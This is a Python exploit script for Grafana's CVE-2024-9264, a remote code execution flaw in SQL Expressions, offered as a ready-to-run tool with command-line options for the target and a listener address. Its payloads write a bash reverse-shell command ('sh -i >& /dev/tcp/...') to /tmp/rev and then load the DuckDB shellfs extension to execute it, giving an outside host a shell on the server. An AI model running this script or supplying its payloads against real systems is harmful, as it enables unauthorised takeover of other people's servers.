1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151
| import requests import argparse
""" Grafana Remote Code Execution (CVE-2024-9264) via SQL Expressions See here: https://grafana.com/blog/2024/10/17/grafana-security-release-critical-severity-fix-for-cve-2024-9264/
Author: z3k0sec // www.zekosec.com """
def authenticate(grafana_url, username, password): """ Authenticate to the Grafana instance.
Args: grafana_url (str): The URL of the Grafana instance. username (str): The username for authentication. password (str): The password for authentication.
Returns: session (requests.Session): The authenticated session. """ login_url = f'{grafana_url}/login'
payload = { 'user': username, 'password': password }
session = requests.Session()
response = session.post(login_url, json=payload)
if response.ok: print("[SUCCESS] Login successful!") return session else: print("[FAILURE] Login failed:", response.status_code, response.text) return None
def create_reverse_shell(session, grafana_url, reverse_ip, reverse_port): """ Create a malicious reverse shell payload in Grafana.
Args: session (requests.Session): The authenticated session. grafana_url (str): The URL of the Grafana instance. reverse_ip (str): The IP address for the reverse shell. reverse_port (str): The port for the reverse shell. """ reverse_shell_command = f"/dev/tcp/{reverse_ip}/{reverse_port} 0>&1"
payload = { "queries": [ { "datasource": { "name": "Expression", "type": "__expr__", "uid": "__expr__" }, "expression": f"SELECT 1;COPY (SELECT 'sh -i >& {reverse_shell_command}') TO '/tmp/rev';", "hide": False, "refId": "B", "type": "sql", "window": "" } ] }
response = session.post( f"{grafana_url}/api/ds/query?ds_type=__expr__&expression=true&requestId=Q100", json=payload )
if response.ok: print("Reverse shell payload sent successfully!") print("Set up a netcat listener on " + reverse_port) else: print("Failed to send payload:", response.status_code, response.text)
def trigger_reverse_shell(session, grafana_url): """ Trigger the reverse shell binary.
Args: session (requests.Session): The authenticated session. grafana_url (str): The URL of the Grafana instance. """ payload = { "queries": [ { "datasource": { "name": "Expression", "type": "__expr__", "uid": "__expr__" }, "expression": "SELECT 1;install shellfs from community;LOAD shellfs;SELECT * FROM read_csv('bash /tmp/rev |');", "hide": False, "refId": "B", "type": "sql", "window": "" } ] }
response = session.post( f"{grafana_url}/api/ds/query?ds_type=__expr__&expression=true&requestId=Q100", json=payload )
if response.ok: print("Triggered reverse shell successfully!") else: print("Failed to trigger reverse shell:", response.status_code, response.text)
def main(grafana_url, username, password, reverse_ip, reverse_port): session = authenticate(grafana_url, username, password)
if session: create_reverse_shell(session, grafana_url, reverse_ip, reverse_port)
trigger_reverse_shell(session, grafana_url)
if __name__ == "__main__": parser = argparse.ArgumentParser(description='Authenticate to Grafana and create a reverse shell payload') parser.add_argument('--url', required=True, help='Grafana URL (e.g., http://127.0.0.1:3000)') parser.add_argument('--username', required=True, help='Grafana username') parser.add_argument('--password', required=True, help='Grafana password') parser.add_argument('--reverse-ip', required=True, help='Reverse shell IP address') parser.add_argument('--reverse-port', required=True, help='Reverse shell port')
args = parser.parse_args()
main(args.url, args.username, args.password, args.reverse_ip, args.reverse_port)
|